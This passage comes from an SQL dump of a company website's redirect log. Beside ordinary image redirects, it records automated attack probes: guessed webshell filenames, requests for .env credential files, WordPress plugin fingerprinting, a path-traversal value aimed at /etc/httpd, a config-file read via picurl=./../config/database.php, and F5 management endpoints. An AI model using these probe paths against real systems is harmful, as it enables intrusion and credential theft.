00:00:00',301),(36732,'http://www.3s-technologies.com.tr/tr/admin/kindeditor/themes/default/default.css',NULL,'http://www.3s-technologies.com.tr/admin/kindeditor/themes/default/default.css','',1,0,'2024-11-04 13:05:57','0000-00-00 00:00:00',301),(36733,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/jvk.jpg',NULL,'http://3s-technologies.com.tr/images/stories/virtuemart/product/resized/jvk.jpg','',2,0,'2024-11-05 02:15:06','0000-00-00 00:00:00',301),(36734,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-20.gif',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/spr-20.gif','',4,0,'2024-11-05 11:25:53','0000-00-00 00:00:00',301),(36735,'http://3s-technologies.com.tr/tr/class_api.php',NULL,'','',9,0,'2024-11-06 12:28:23','0000-00-00 00:00:00',301),(36736,'http://3s-technologies.com.tr/tr/bless.php',NULL,'','',241,0,'2024-11-06 12:28:41','0000-00-00 00:00:00',301),(36737,'http://3s-technologies.com.tr/tr/wp-content/defaults.php',NULL,'','',2,0,'2024-11-06 12:29:44','0000-00-00 00:00:00',301),(36738,'http://3s-technologies.com.tr/tr/wp-content/product.php',NULL,'','',33,0,'2024-11-06 12:29:59','0000-00-00 00:00:00',301),(36739,'http://3s-technologies.com.tr/tr/wp-admin/item.php',NULL,'','',25,0,'2024-11-06 12:30:11','0000-00-00 00:00:00',301),(36740,'http://3s-technologies.com.tr/tr/wp-admin/click.php',NULL,'','',2,0,'2024-11-06 12:30:31','0000-00-00 00:00:00',301),(36741,'http://3s-technologies.com.tr/tr/wp-content/click.php',NULL,'','',18,0,'2024-11-06 12:30:48','0000-00-00 00:00:00',301),(36742,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/admin.php',NULL,'','',108,0,'2024-11-06 12:32:17','0000-00-00 00:00:00',301),(36743,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/radio.php',NULL,'','',5,0,'2024-11-06 12:32:51','0000-00-00 00:00:00',301),(36744,'http://3s-technologies.com.tr/tr/wp-content/class_api.php',NULL,'','',1,0,'2024-11-06 12:33:30','0000-00-00 00:00:00',301),(36745,'https://3s-technologies.com.tr/console/images/%2e%2e%2fconsole.portal',NULL,'','',1,0,'2024-11-06 16:29:48','0000-00-00 00:00:00',301),(36746,'https://3s-technologies.com.tr/module/',NULL,'https://3s-technologies.com.tradmin/view:modules/load_module:users','',2,0,'2024-11-06 16:30:49','0000-00-00 00:00:00',301),(36747,'https://3s-technologies.com.tr/classes/login.php?f=login',NULL,'','',1,0,'2024-11-06 16:30:49','0000-00-00 00:00:00',301),(36748,'https://3s-technologies.com.tr/logupload?logmetadata={\"itrlogpath\": \"../../../../../../etc/httpd/html/wsgi_log_upload\", \"logfiletype\": \"log_upload_wsgi.py\", \"workloadid\": \"2\"}',NULL,'https://3s-technologies.com.tr','',1,0,'2024-11-06 16:30:51','0000-00-00 00:00:00',301),(36749,'https://3s-technologies.com.tr/cgi-bin/mt/mt-xmlrpc.cgi',NULL,'','',1,0,'2024-11-06 16:30:52','0000-00-00 00:00:00',301),(36750,'https://3s-technologies.com.tr/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php',NULL,'','',1,0,'2024-11-06 16:30:53','0000-00-00 00:00:00',301),(36751,'https://3s-technologies.com.tr/upload/index.php?route=extension/payment/divido/update',NULL,'','',1,0,'2024-11-06 16:31:02','0000-00-00 00:00:00',301),(36752,'https://3s-technologies.com.tr/filedownload?action=downloadbackupfile',NULL,'','',3,0,'2024-11-06 16:39:04','0000-00-00 00:00:00',301),(36753,'http://3s-technologies.com.tr/tmui/login.jsp',NULL,'','',2,0,'2024-11-06 16:47:33','0000-00-00 00:00:00',301),(36754,'https://3s-technologies.com.tr/mgmt/tm/util/bash',NULL,'','',3,0,'2024-11-06 17:03:11','0000-00-00 00:00:00',301),(36755,'https://3s-technologies.com.tr/mgmt/shared/authn/login',NULL,'','',3,0,'2024-11-06 17:13:40','0000-00-00 00:00:00',301),(36756,'https://3s-technologies.com.tr/guest_auth/guestisup.php',NULL,'','',1,0,'2024-11-06 20:07:19','0000-00-00 00:00:00',301),(36757,'https://3s-technologies.com.tr/webadm/?q=moni_detail.do&action=gragh',NULL,'','',2,0,'2024-11-06 20:07:20','0000-00-00 00:00:00',301),(36758,'https://3s-technologies.com.tr/bsh.servlet.bshservlet',NULL,'','',2,0,'2024-11-06 20:07:20','0000-00-00 00:00:00',301),(36759,'https://3s-technologies.com.tr/weaver/org.apache.xmlrpc.webserver.xmlrpcservlet',NULL,'','',2,0,'2024-11-06 20:08:07','0000-00-00 00:00:00',301),(36760,'https://3s-technologies.com.tr/zentao/user-login.html',NULL,'https://3s-technologies.com.tr/zentao/user-login.html','',2,0,'2024-11-06 20:08:10','0000-00-00 00:00:00',301),(36761,'https://3s-technologies.com.tr/mobile/plugin/browser.jsp',NULL,'','',2,0,'2024-11-06 20:08:10','0000-00-00 00:00:00',301),(36762,'https://3s-technologies.com.tr/datasetparam/verification;swagger-ui/',NULL,'','',2,0,'2024-11-06 20:08:16','0000-00-00 00:00:00',301),(36763,'https://3s-technologies.com.tr/index.php/user/dologin',NULL,'','',2,0,'2024-11-06 20:08:21','0000-00-00 00:00:00',301),(36764,'https://3s-technologies.com.tr/uapjs/jsinvoke/?action=invoke',NULL,'','',2,0,'2024-11-06 20:09:50','0000-00-00 00:00:00',301),(36765,'https://3s-technologies.com.tr/seeyon/htmlofficeservlet',NULL,'','',2,0,'2024-11-06 20:12:54','0000-00-00 00:00:00',301),(36766,'https://3s-technologies.com.tr/cgi-bin/rpc',NULL,'','',2,0,'2024-11-06 20:13:25','0000-00-00 00:00:00',301),(36767,'https://3s-technologies.com.tr/sys/ui/extend/varkind/custom.jsp',NULL,'','',4,0,'2024-11-06 20:15:17','0000-00-00 00:00:00',301),(36768,'https://3s-technologies.com.tr/servlet/~ic/bsh.servlet.bshservlet',NULL,'','',4,0,'2024-11-06 20:15:17','0000-00-00 00:00:00',301),(36769,'https://3s-technologies.com.tr/general/index/uploadfile.php?m=uploadpicture&uploadtype=eoffice_logo&userid',NULL,'','',2,0,'2024-11-06 20:15:50','0000-00-00 00:00:00',301),(36770,'https://3s-technologies.com.tr/public/index.php/material/material/_download_imgage?media_id=1&picurl=./../config/database.php',NULL,'','',2,0,'2024-11-06 20:17:36','0000-00-00 00:00:00',301),(36771,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/kopyasä±-gf-12ht_300x300.gif',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/kopyas%C3%84%C2%B1-gf-12ht_300x300.gif','',8,0,'2024-11-06 21:25:09','0000-00-00 00:00:00',301),(36772,'https://3s-technologies.com.tr/wp-admin/options-general.php?page=smartcode',NULL,'','',1,0,'2024-11-07 06:08:44','0000-00-00 00:00:00',301),(36773,'https://3s-technologies.com.tr/vendor/htmlawed/htmlawed/htmlawedtest.php',NULL,'','',3,0,'2024-11-07 06:08:45','0000-00-00 00:00:00',301),(36774,'https://3s-technologies.com.tr/login',NULL,'','',1,0,'2024-11-07 06:08:47','0000-00-00 00:00:00',301),(36775,'https://3s-technologies.com.tr/interconnessioni.php',NULL,'','',1,0,'2024-11-07 06:08:55','0000-00-00 00:00:00',301),(36776,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spartan12s-400x268.jpg',NULL,'http://3s-technologies.com.tr/images/stories/virtuemart/product/resized/spartan12s-400x268.jpg','',3,0,'2024-11-07 22:35:22','0000-00-00 00:00:00',301),(36777,'http://mail.3s-technologies.com.tr/tr/class_api.php',NULL,'','',1,0,'2024-11-08 04:16:38','0000-00-00 00:00:00',301),(36778,'http://mail.3s-technologies.com.tr/tr/bless.php',NULL,'','',63,0,'2024-11-08 04:17:20','0000-00-00 00:00:00',301),(36779,'http://mail.3s-technologies.com.tr/tr/wp-content/defaults.php',NULL,'','',1,0,'2024-11-08 04:17:40','0000-00-00 00:00:00',301),(36780,'http://mail.3s-technologies.com.tr/tr/wp-content/product.php',NULL,'','',2,0,'2024-11-08 04:18:08','0000-00-00 00:00:00',301),(36781,'http://mail.3s-technologies.com.tr/tr/wp-admin/item.php',NULL,'','',1,0,'2024-11-08 04:18:26','0000-00-00 00:00:00',301),(36782,'http://mail.3s-technologies.com.tr/tr/wp-admin/click.php',NULL,'','',1,0,'2024-11-08 04:19:17','0000-00-00 00:00:00',301),(36783,'http://mail.3s-technologies.com.tr/tr/wp-content/click.php',NULL,'','',1,0,'2024-11-08 04:19:49','0000-00-00 00:00:00',301),(36784,'http://mail.3s-technologies.com.tr/tr/.well-known/acme-challenge/class_api.php',NULL,'','',1,0,'2024-11-08 04:20:39','0000-00-00 00:00:00',301),(36785,'http://mail.3s-technologies.com.tr/tr/.well-known/acme-challenge/admin.php',NULL,'','',9,0,'2024-11-08 04:20:59','0000-00-00 00:00:00',301),(36786,'http://mail.3s-technologies.com.tr/tr/wp-includes/phpmailer/radio.php',NULL,'','',1,0,'2024-11-08 04:21:26','0000-00-00 00:00:00',301),(36787,'http://mail.3s-technologies.com.tr/tr/wp-includes/item.php',NULL,'','',2,0,'2024-11-08 04:22:14','0000-00-00 00:00:00',301),(36788,'http://mail.3s-technologies.com.tr/tr/wp-content/class_api.php',NULL,'','',1,0,'2024-11-08 04:23:02','0000-00-00 00:00:00',301),(36789,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_mi300.jpg',NULL,'http://3s-technologies.com.tr/images/stories/virtuemart/product/resized/t_mi300.jpg','',4,0,'2024-11-08 14:31:13','0000-00-00 00:00:00',301),(36790,'http://www.3s-technologies.com.tr/tr/plug/oem/plug.xml',NULL,'http://www.3s-technologies.com.tr/plug/oem/plug.xml','',1,0,'2024-11-09 04:30:43','0000-00-00 00:00:00',301),(36791,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/zero-g3.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/zero-g3.jpg','',4,0,'2024-11-09 10:20:47','0000-00-00 00:00:00',301),(36792,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/spr-25.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/resized/spr-25.jpg','',4,0,'2024-11-09 10:45:48','0000-00-00 00:00:00',301),(36793,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/kopyası-gf-12ht.gif',NULL,'http://3s-technologies.com.tr/images/stories/virtuemart/product/resized/kopyas%C4%B1-gf-12ht.gif','',6,0,'2024-11-09 20:27:05','0000-00-00 00:00:00',301),(36794,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/avb_1.jpg',NULL,'http://3s-technologies.com.tr/images/stories/virtuemart/product/resized/avb_1.jpg','',4,0,'2024-11-10 18:06:36','0000-00-00 00:00:00',301),(36795,'http://3s-technologies.com.tr/guest_auth/guestisup.php',NULL,'','',1,0,'2024-11-11 11:46:20','0000-00-00 00:00:00',301),(36796,'http://www.3s-technologies.com.tr/tr/admin/ueditor/dialogs/internal.js',NULL,'http://www.3s-technologies.com.tr/admin/ueditor/dialogs/internal.js','',1,0,'2024-11-12 02:50:02','0000-00-00 00:00:00',301),(36797,'http://3s-technologies.com.tr/en/wp-content/themes/wplms/style.css',NULL,'','',1,0,'2024-11-15 21:05:37','0000-00-00 00:00:00',301),(36798,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-jobsearch/admin/css/admin.css',NULL,'','',1,0,'2024-11-15 21:05:38','0000-00-00 00:00:00',301),(36799,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-wc-affiliate-program/languages/rtwwwap-wp-wc-affiliate-program.pot',NULL,'','',1,0,'2024-11-15 21:05:39','0000-00-00 00:00:00',301),(36800,'http://3s-technologies.com.tr/en/wp-content/plugins/ultimate_ai/assets/css/style.css',NULL,'','',1,0,'2024-11-15 21:05:40','0000-00-00 00:00:00',301),(36801,'http://3s-technologies.com.tr/en/wp-content/plugins/latepoint/readme.txt',NULL,'','',1,0,'2024-11-15 21:05:41','0000-00-00 00:00:00',301),(36802,'http://3s-technologies.com.tr/en/wp-content/plugins/gutenkit-blocks-addon/readme.txt',NULL,'','',1,0,'2024-11-15 21:05:42','0000-00-00 00:00:00',301),(36803,'http://3s-technologies.com.tr/en/wp-content/plugins/rss-feed-post-generator-echo/readme.txt',NULL,'','',1,0,'2024-11-15 21:05:44','0000-00-00 00:00:00',301),(36804,'http://3s-technologies.com.tr/en/wp-content/plugins/json-api-user/readme.txt',NULL,'','',1,0,'2024-11-15 21:05:45','0000-00-00 00:00:00',301),(36805,'http://3s-technologies.com.tr/en/wp-content/plugins/charitable/changelog.md',NULL,'','',1,0,'2024-11-15 21:05:46','0000-00-00 00:00:00',301),(36806,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-job-portal/readme.txt',NULL,'','',1,0,'2024-11-15 21:05:48','0000-00-00 00:00:00',301),(36807,'http://3s-technologies.com.tr/en/wp-content/plugins/give/readme.txt',NULL,'','',1,0,'2024-11-15 21:05:50','0000-00-00 00:00:00',301),(36808,'http://3s-technologies.com.tr/en/wp-content/debug.log',NULL,'','',1,0,'2024-11-15 21:05:51','0000-00-00 00:00:00',301),(36809,'http://3s-technologies.com.tr/en/wp-content/plugins/zm-ajax-login-register/readme.txt',NULL,'','',1,0,'2024-11-15 21:05:52','0000-00-00 00:00:00',301),(36810,'http://3s-technologies.com.tr/en/wp-content/plugins/instawp-connect/readme.txt',NULL,'','',3,0,'2024-11-15 21:05:53','0000-00-00 00:00:00',301),(36811,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-seopress/readme.txt',NULL,'','',1,0,'2024-11-15 21:05:56','0000-00-00 00:00:00',301),(36812,'http://3s-technologies.com.tr/en/wp-content/plugins/keydatas/readme.txt',NULL,'','',1,0,'2024-11-15 21:05:57','0000-00-00 00:00:00',301),(36813,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-mlm/readme.txt',NULL,'','',1,0,'2024-11-15 21:05:59','0000-00-00 00:00:00',301),(36814,'http://3s-technologies.com.tr/en/wp-content/plugins/userpro/changelog.txt',NULL,'','',2,0,'2024-11-15 21:06:00','0000-00-00 00:00:00',301),(36815,'http://3s-technologies.com.tr/en/wp-content/plugins/chatbot-chatgpt/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:01','0000-00-00 00:00:00',301),(36816,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-photo-album-plus/changelog.txt',NULL,'','',1,0,'2024-11-15 21:06:04','0000-00-00 00:00:00',301),(36817,'http://3s-technologies.com.tr/en/wp-content/plugins/startklar-elmentor-forms-extwidgets/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:05','0000-00-00 00:00:00',301),(36818,'http://3s-technologies.com.tr/en/wp-content/plugins/edwiser-bridge/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:06','0000-00-00 00:00:00',301),(36819,'http://3s-technologies.com.tr/en/wp-content/plugins/learning-management-system/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:07','0000-00-00 00:00:00',301),(36820,'http://3s-technologies.com.tr/en/wp-content/plugins/woocommerce-simple-registration/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:08','0000-00-00 00:00:00',301),(36821,'http://3s-technologies.com.tr/en/wp-content/plugins/miniorange-2-factor-authentication/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:10','0000-00-00 00:00:00',301),(36822,'http://3s-technologies.com.tr/en/wp-content/plugins/miniorange-malware-protection/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:12','0000-00-00 00:00:00',301),(36823,'http://3s-technologies.com.tr/en/wp-content/plugins/activedemand/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:17','0000-00-00 00:00:00',301),(36824,'http://3s-technologies.com.tr/en/wp-content/plugins/phppoet-checkout-fields/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:18','0000-00-00 00:00:00',301),(36825,'http://3s-technologies.com.tr/en/wp-content/plugins/bertha-ai-free/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:21','0000-00-00 00:00:00',301),(36826,'http://3s-technologies.com.tr/en/wp-content/plugins/rencontre/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:21','0000-00-00 00:00:00',301),(36827,'http://3s-technologies.com.tr/en/wp-content/plugins/login-as-customer-or-user/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:22','0000-00-00 00:00:00',301),(36828,'http://3s-technologies.com.tr/en/wp-content/plugins/post-smtp/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:24','0000-00-00 00:00:00',301),(36829,'http://3s-technologies.com.tr/en/wp-content/plugins/ai-engine/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:25','0000-00-00 00:00:00',301),(36830,'http://3s-technologies.com.tr/en/wp-content/plugins/backup-backup/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:26','0000-00-00 00:00:00',301),(36831,'http://3s-technologies.com.tr/en/wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:28','0000-00-00 00:00:00',301),(36832,'http://3s-technologies.com.tr/en/wp-content/plugins/import-xml-feed/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:30','0000-00-00 00:00:00',301),(36833,'http://3s-technologies.com.tr/en/wp-content/plugins/kadence-blocks/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:33','0000-00-00 00:00:00',301),(36834,'http://3s-technologies.com.tr/en/wp-content/plugins/jupiterx-core/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:33','0000-00-00 00:00:00',301),(36835,'http://3s-technologies.com.tr/en/wp-content/plugins/forminator/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:34','0000-00-00 00:00:00',301),(36836,'http://3s-technologies.com.tr/en/wp-content/plugins/ht-mega-for-elementor/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:36','0000-00-00 00:00:00',301),(36837,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-post-author/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:36','0000-00-00 00:00:00',301),(36838,'http://3s-technologies.com.tr/en/wp-content/plugins/n-media-woocommerce-checkout-fields/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:45','0000-00-00 00:00:00',301),(36839,'http://3s-technologies.com.tr/en/wp-content/plugins/videowhisper-live-streaming-integration/readme.txt',NULL,'','',1,0,'2024-11-15 21:06:46','0000-00-00 00:00:00',301),(36840,'http://3s-technologies.com.tr/en/wp-content/themes/statfort-new/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:06:49','0000-00-00 00:00:00',301),(36841,'http://3s-technologies.com.tr/en/wp-content/themes/faith-theme/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:06:51','0000-00-00 00:00:00',301),(36842,'http://3s-technologies.com.tr/en/wp-content/themes/soccer-theme/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:06:52','0000-00-00 00:00:00',301),(36843,'http://3s-technologies.com.tr/en/wp-content/themes/churchlife/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:06:53','0000-00-00 00:00:00',301),(36844,'http://3s-technologies.com.tr/en/wp-content/themes/onelife/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:06:54','0000-00-00 00:00:00',301),(36845,'http://3s-technologies.com.tr/en/wp-content/themes/snapture/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:06:55','0000-00-00 00:00:00',301),(36846,'http://3s-technologies.com.tr/en/wp-content/themes/theme-deejay/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:06:56','0000-00-00 00:00:00',301),(36847,'http://3s-technologies.com.tr/en/wp-content/themes/bolster-theme/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:06:57','0000-00-00 00:00:00',301),(36848,'http://3s-technologies.com.tr/en/wp-content/themes/rocky-theme/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:06:58','0000-00-00 00:00:00',301),(36849,'http://3s-technologies.com.tr/en/wp-content/themes/bolster/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:06:59','0000-00-00 00:00:00',301),(36850,'http://3s-technologies.com.tr/en/wp-content/themes/soundblast/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:07:00','0000-00-00 00:00:00',301),(36851,'http://3s-technologies.com.tr/en/wp-content/themes/spikes-black/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:07:03','0000-00-00 00:00:00',301),(36852,'http://3s-technologies.com.tr/en/wp-content/themes/spikes/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:07:04','0000-00-00 00:00:00',301),(36853,'http://3s-technologies.com.tr/en/wp-content/themes/kingclub-theme/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:07:05','0000-00-00 00:00:00',301),(36854,'http://3s-technologies.com.tr/en/wp-content/themes/club-theme/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:07:06','0000-00-00 00:00:00',301),(36855,'http://3s-technologies.com.tr/en/wp-content/themes/statfort/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:07:07','0000-00-00 00:00:00',301),(36856,'http://3s-technologies.com.tr/en/wp-content/themes/aidreform/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:07:08','0000-00-00 00:00:00',301),(36857,'http://3s-technologies.com.tr/en/wp-content/themes/footysquare/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:07:09','0000-00-00 00:00:00',301),(36858,'http://3s-technologies.com.tr/en/wp-content/themes/westand/include/lang_upload.php',NULL,'','',1,0,'2024-11-15 21:07:10','0000-00-00 00:00:00',301),(36859,'http://3s-technologies.com.tr/en/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php',NULL,'','',1,0,'2024-11-15 21:07:11','0000-00-00 00:00:00',301),(36860,'http://3s-technologies.com.tr/en/wp-content/plugins/yith-woocommerce-gift-cards-premium/readme.txt',NULL,'','',1,0,'2024-11-15 21:07:13','0000-00-00 00:00:00',301),(36861,'http://3s-technologies.com.tr/en/wp-content/plugins/membership-for-woocommerce/readme.txt',NULL,'','',1,0,'2024-11-15 21:07:14','0000-00-00 00:00:00',301),(36862,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-upg/readme.txt',NULL,'','',1,0,'2024-11-15 21:07:15','0000-00-00 00:00:00',301),(36863,'http://3s-technologies.com.tr/en/wp-content/plugins/user-verification/readme.txt',NULL,'','',1,0,'2024-11-15 21:07:16','0000-00-00 00:00:00',301),(36864,'http://3s-technologies.com.tr/en/wp-content/plugins/booking-calendar/readme.txt',NULL,'','',1,0,'2024-11-15 21:07:17','0000-00-00 00:00:00',301),(36865,'http://3s-technologies.com.tr/en/wp-content/plugins/woo-refund-and-exchange-lite/readme.txt',NULL,'','',1,0,'2024-11-15 21:07:18','0000-00-00 00:00:00',301),(36866,'http://3s-technologies.com.tr/en/wp-content/plugins/armember/js/arm_widgets_js.js',NULL,'','',1,0,'2024-11-15 21:07:19','0000-00-00 00:00:00',301),(36867,'http://3s-technologies.com.tr/en/wp-content/plugins/armember/documentation/index.html',NULL,'','',1,0,'2024-11-15 21:07:20','0000-00-00 00:00:00',301),(36868,'http://3s-technologies.com.tr/en/wp-content/plugins/jobboardwp/readme.txt',NULL,'','',1,0,'2024-11-15 21:07:21','0000-00-00 00:00:00',301),(36869,'http://3s-technologies.com.tr/en/wp-content/themes/listingo/readme.txt',NULL,'','',1,0,'2024-11-15 21:07:22','0000-00-00 00:00:00',301),(36870,'http://3s-technologies.com.tr/en/wp-content/themes/listingo/js/listingo_callbacks.js',NULL,'','',1,0,'2024-11-15 21:07:23','0000-00-00 00:00:00',301),(36871,'http://3s-technologies.com.tr/en/wp-content/themes/greyd_suite/style.css',NULL,'','',1,0,'2024-11-15 21:07:24','0000-00-00 00:00:00',301),(36872,'http://3s-technologies.com.tr/en/wp-content/plugins/alphabetic-pagination/readme.txt',NULL,'','',1,0,'2024-11-15 21:07:25','0000-00-00 00:00:00',301),(36873,'http://3s-technologies.com.tr/en/wp-content/plugins/scripts-organizer/plugins/meta-box/readme.txt',NULL,'','',1,0,'2024-11-15 21:07:26','0000-00-00 00:00:00',301),(36874,'http://3s-technologies.com.tr/en/wp-content/themes/workreap/style.css',NULL,'','',1,0,'2024-11-15 21:07:27','0000-00-00 00:00:00',301),(36875,'http://3s-technologies.com.tr/en/wp-content/plugins/wpgateway/css/style.css',NULL,'','',1,0,'2024-11-15 21:07:28','0000-00-00 00:00:00',301),(36876,'http://3s-technologies.com.tr/tr/wp-admin/includes/nav.php',NULL,'','',25,0,'2024-11-17 11:37:11','0000-00-00 00:00:00',301),(36877,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core32/curve25519/ge/core32.php',NULL,'','',13,0,'2024-11-17 11:37:20','0000-00-00 00:00:00',301),(36878,'http://3s-technologies.com.tr/tr/go.php',NULL,'','',114,0,'2024-11-17 18:39:33','0000-00-00 00:00:00',301),(36879,'http://3s-technologies.com.tr/tr/wp-content/themes/too.php',NULL,'','',15,0,'2024-11-17 18:39:40','0000-00-00 00:00:00',301),(36880,'http://3s-technologies.com.tr/tr/wp-includes/assets/winnner.php',NULL,'','',7,0,'2024-11-17 18:39:47','0000-00-00 00:00:00',301),(36881,'http://3s-technologies.com.tr/tr/plugins/function.php',NULL,'','',31,0,'2024-11-17 19:46:54','0000-00-00 00:00:00',301),(36882,'http://3s-technologies.com.tr/tr/file/function.php',NULL,'','',38,0,'2024-11-17 19:46:56','0000-00-00 00:00:00',301),(36883,'http://3s-technologies.com.tr/tr/as/function',NULL,'','',23,0,'2024-11-17 19:46:58','0000-00-00 00:00:00',301),(36884,'http://3s-technologies.com.tr/tr/mah/function.php',NULL,'','',110,0,'2024-11-17 19:47:00','0000-00-00 00:00:00',301),(36885,'http://3s-technologies.com.tr/tr/admin/function.php',NULL,'','',298,0,'2024-11-17 19:47:03','0000-00-00 00:00:00',301),(36886,'http://3s-technologies.com.tr/tr/doc/function.php',NULL,'','',21,0,'2024-11-17 19:47:06','0000-00-00 00:00:00',301),(36887,'http://3s-technologies.com.tr/tr/about/function.php',NULL,'','',300,0,'2024-11-17 19:47:08','0000-00-00 00:00:00',301),(36888,'http://3s-technologies.com.tr/tr/index/function.php',NULL,'','',374,0,'2024-11-17 19:47:11','0000-00-00 00:00:00',301),(36889,'http://3s-technologies.com.tr/tr/wp-admin/css/autoload_classmap.php',NULL,'','',13,0,'2024-11-18 00:54:27','0000-00-00 00:00:00',301),(36890,'http://3s-technologies.com.tr/tr/wp-admin/images/autoload_classmap.php',NULL,'','',15,0,'2024-11-18 00:54:29','0000-00-00 00:00:00',301),(36891,'http://3s-technologies.com.tr/tr/wp-includes/pomo/autoload_classmap.php',NULL,'','',8,0,'2024-11-18 00:54:32','0000-00-00 00:00:00',301),(36892,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/autoload_classmap.php',NULL,'','',33,0,'2024-11-18 00:54:35','0000-00-00 00:00:00',301),(36893,'http://3s-technologies.com.tr/tr/wp-includes/js/autoload_classmap.php',NULL,'','',8,0,'2024-11-18 00:54:37','0000-00-00 00:00:00',301),(36894,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/autoload_classmap.php',NULL,'','',19,0,'2024-11-18 00:54:39','0000-00-00 00:00:00',301),(36895,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/autoload_classmap.php',NULL,'','',21,0,'2024-11-18 00:54:42','0000-00-00 00:00:00',301),(36896,'http://3s-technologies.com.tr/tr/wp-includes/widgets/autoload_classmap.php',NULL,'','',20,0,'2024-11-18 00:54:44','0000-00-00 00:00:00',301),(36897,'http://3s-technologies.com.tr/tr/wp-content/uploads/autoload_classmap.php',NULL,'','',87,0,'2024-11-18 00:54:47','0000-00-00 00:00:00',301),(36898,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/le40v.jpg',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/le40v.jpg','',3,0,'2024-11-18 06:45:19','0000-00-00 00:00:00',301),(36899,'http://3s-technologies.com.tr/.env.dev',NULL,'','',1,0,'2024-11-19 01:50:46','0000-00-00 00:00:00',301),(36900,'http://3s-technologies.com.tr/.env.example',NULL,'','',1,0,'2024-11-19 01:50:48','0000-00-00 00:00:00',301),(36901,'http://3s-technologies.com.tr/.env.php',NULL,'','',1,0,'2024-11-19 01:50:50','0000-00-00 00:00:00',301),(36902,'http://3s-technologies.com.tr/admin/.env',NULL,'','',1,0,'2024-11-19 01:50:51','0000-00-00 00:00:00',301),(36903,'http://3s-technologies.com.tr/app/config/.env',NULL,'','',1,0,'2024-11-19 01:50:56','0000-00-00 00:00:00',301),(36904,'http://3s-technologies.com.tr/audio/.env',NULL,'','',1,0,'2024-11-19 01:50:59','0000-00-00 00:00:00',301),(36905,'http://3s-technologies.com.tr/aws.env',NULL,'','',1,0,'2024-11-19 01:51:00','0000-00-00 00:00:00',301),(36906,'http://3s-technologies.com.tr/backend/.env',NULL,'','',1,0,'2024-11-19 01:51:01','0000-00-00 00:00:00',301),(36907,'http://3s-technologies.com.tr/base/.env',NULL,'','',1,0,'2024-11-19 01:51:03','0000-00-00 00:00:00',301),(36908,'http://3s-technologies.com.tr/blog/.env',NULL,'','',1,0,'2024-11-19 01:51:04','0000-00-00 00:00:00',301),(36909,'http://3s-technologies.com.tr/blogs/.env',NULL,'','',1,0,'2024-11-19 01:51:05','0000-00-00 00:00:00',301),(36910,'http://3s-technologies.com.tr/cgi-bin/.env',NULL,'','',1,0,'2024-11-19 01:51:06','0000-00-00 00:00:00',301),(36911,'http://3s-technologies.com.tr/client/.env',NULL,'','',1,0,'2024-11-19 